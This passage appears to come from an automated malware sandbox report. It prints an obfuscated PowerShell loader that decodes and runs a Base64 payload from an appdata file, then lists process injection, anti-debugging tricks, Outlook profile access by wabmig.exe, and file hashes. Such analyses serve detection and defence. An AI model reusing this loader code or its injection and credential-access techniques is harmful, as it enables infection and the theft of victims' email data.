'Samvr$,mbinMAp elaudtrrnhadinnSve fePercis Irres ejla.KlausDFjerdoSprogwSausan mlonlTvisto kumlaBarbadBandoFOplagi HundlgstelePsyke(St,rt$Dipl LUrohyeL bera Ladlr Discn Smadsmammu,Hornb$ TidsuPsyc sflygte Def l SemivUnif.iAflnnsCo,enkJusteeAfskr) olde ';$uselviske=$Kodestrengens[0];Reprobateness (Trkkenaalens ' fran$SubnagNyttelUsquaOProgrbForlyAserviLChr,n:Pe svl landOUnappp SminhMo.kkoMarimb SnaprAff iaKlat N FrikC Windhda oe1V rni0Pauci=Stodg(Ugen T fedte PalesFormut Sovj-GstelpHersaAEctostPattih Twin Fore$ResegU lagsStri.ePartalSt rtvAfblni Ora.sGobetk iagneSlate)St kr ');while (!$Lophobranch10) {Reprobateness (Trkkenaalens 'Drabs$Be,ingCatablBa,ytoAnthobForuraC rdplI,pas:Ad naBOpstraMolocrProceyDubbatDimiso.pflosLateduMe fal hypop yclh MobiaglanstPro rePostv=Stati$Ro sstTryparCapitu UdskeSit e ') ;Reprobateness $Amtsskattekredsenes;Reprobateness (Trkkenaalens 'Ungu.S TalltGollyaHalbarEksekt,irmi-TaetbSArdeblK.dnaeNum,eeStarbpFaine Guilf4 Pr,d ');Reprobateness (Trkkenaalens ' Stvd$Kloneg KvldlAeropo SubsbBebygaAfskelWloka:RykniLNecreobrostpBowsth kvaoBetnkbTe ver neraaLawyenTriphcUnatuh Bund1Ampel0Avl,a=Bundm(ma.toTKoffae UdfosdipodtStj,r-p eudPTyndta afft Dexth talt Fretf$TarteuContusneu reIsoprlGentev T uci ,nsas Mrklk EuroeWindo) Av i ') ;Reprobateness (Trkkenaalens ' Gram$ BrangEidoslLuftio Impob Sk ba arnal Extr: DispCRevenoBovnerOutk n ind,s.ridetBl dgaDropnrSkr ecSengehL.nds=Bosta$MahargVedlil,xioloWhippbH ulsaDrosklsaltu:stenuHNondiaFortal EftevCentrkExhumuSkr bsHistoi readnSukkeePragmnNoncosCyno,+afnde+ Pigt%Lathe$ JettH ,risiRooyebUlvaseOe oprAppetnStanca uncettrngteTrakedEstud.HydrocOnd loBl reuParatnStumbtOrgan ') ;$Learns=$Hibernated[$Cornstarch];}$Performativ=318381;$Creep=30121;Reprobateness (Trkkenaalens 'Aaben$PostpgUlysslOdaluo GonibVid.oaDiplel tele:Alsi CUnredyU gumkU deteDagdrlGlycohParasjSubwae Bortlnav,gmOra g Vokse=Levne SprjtGGe tieGodvitCockl-com lC P lyoskemancorontSkrekeSkandn ctitSamle Se,ul$ G,mluukends Bline,oncolC shovBrydsiKolors mbakKrikkestarr ');Reprobateness (Trkkenaalens 'Dul e$ AflegLogiclOssico s.ryb SlubaWire.l Impa:I posN BurroProgrn ForsuLeucon Om ui ediktGeomeyIn se Spir=Tri s ,rune[RygklSTerroyOvermsDdsantFleeceFestlmNonic.InvolCOutflo talinBealav TankeRidderrettetKatar]Dogn,:sti e:Til.lF Wat.rstarto ScutmPers BTerpeaMtaa,s timweAut r6Richm4T ksoSNursetpestarSamleiBase n .ictgProdu( nonc$EksisCJawfay BrdbkS yggeDichllSkraahScripjfa.oreMiniclOutstm,atte)S,abm ');Reprobateness (Trkkenaalens 'Vindu$Hav rgThalalFagkooUnmarb elsiaOverdl Un p: KontCsakt iSu ejrUriaskHindsudashbs Undem Sup aPostrnK dnaePunitgEl sae Proxnnu.ins Foll Sa ku= Di p Champ[CheveS Intey GrotsSkibstTvisteLe tim Infe.WilloTAlle,eSubroxTagryt Rwan.Rykk.EAppronBaregcSemisoTils dFormsitropon SfyrgSa kv]Blvre:Whenc: SoleA T deS,reebCPrenoILes hISl ep.ZulkaGPeride rect Hyt,SD.legt KrakrNain iTomatn Sp ogCassa(bo sa$TypotN LichoOceannkomp.u N henfilteiP orotUdspiy poly)Forbu ');Reprobateness (Trkkenaalens ' Lung$Wi.elgMethylOodlioU detbFljteaWeirdl Ultr: Ue gLPrecioMonumdTibetrtrlaseMucrotGela = .nsu$ BremCMiau iHeikkrTu bokfleayu GudssForbimFungaaCart nKampae Attrgm rsheVindbnmisesssiren.Ce.trs Specu ndebOverps Re,ttInjunrblanki StagnMiljfgDou h(Sl tb$ FlavPM neleSn errBussefSaneroRefler iphtmBurhiaSavkltgypsii AllavEsche,Spise$Un,auCFstner Row.eT,rkieZeoidpDal l)Int l ');Reprobateness $Lodret;"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Gelatinerne.Aut && echo t"5⤵
- System Location Discovery: System Language Discovery
PID:536
-
-
C:\Program Files (x86)\windows mail\wabmig.exe"C:\Program Files (x86)\windows mail\wabmig.exe"5⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1732
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5606eb68749f1535e4b078ef660d7d57d
SHA1a597c2309c77ce4f933aa212c540f5ef760083c2
SHA256ad2400c68931503f0771315f174bdd41393a2dc92085a84d2675cca4c91d21e2
SHA5125dae043c907de8f77d477de6062dfacd0af059ba4b608f0311468795baccf73e5e38e46bd2e97e4a3d23a1ca7ef3ad6980dd8e67829a18c6dd6343b26118aca5
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
453KB
MD5985685876bc8b44873dac639c04c7624
SHA1ce7a0057d8fe020f2fe4cd5ef1634813e089cda3
SHA256f4e2a02af4a48376f1681ecf3d0f158c10449eb7ee2c6f1e86c519dd552e9a80
SHA512e634ea9f282d714c4a552bc6c4d35a95dcd4a1ea14cd4c1cc306e570dc97285c15177b8aa7b219f6d2bc23c121491d6ac44d29b6f4489b49d130628dfa019079
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3434294380-2554721341-1919518612-1000\0f5007522459c86e95ffcc62f32308f1_d9071d2c-e5ad-4187-a976-30114bb93bf6
Filesize46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3434294380-2554721341-1919518612-1000\0f5007522459c86e95ffcc62f32308f1_d9071d2c-e5ad-4187-a976-30114bb93bf6
Filesize46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8PPU6UB5WV99DKPMUO3I.temp
Filesize7KB
MD5f158637e511effcc651e7c40891f65b2
SHA119b89b857c3ae70e87a26ea6806467272cb785ef
SHA256805d7d6c058916aafc3adda0b4bbcefa441d5caac3281e0a917a82c2dde0cd15
SHA512385ea0d5a0cc75089a7c0250b701a2eadec506e89ee6f7ebc4bfb774ad06afeb1a1014e200eafd7894a8dc79d6d0a296a554889ced68c92e4756e0af45f7b353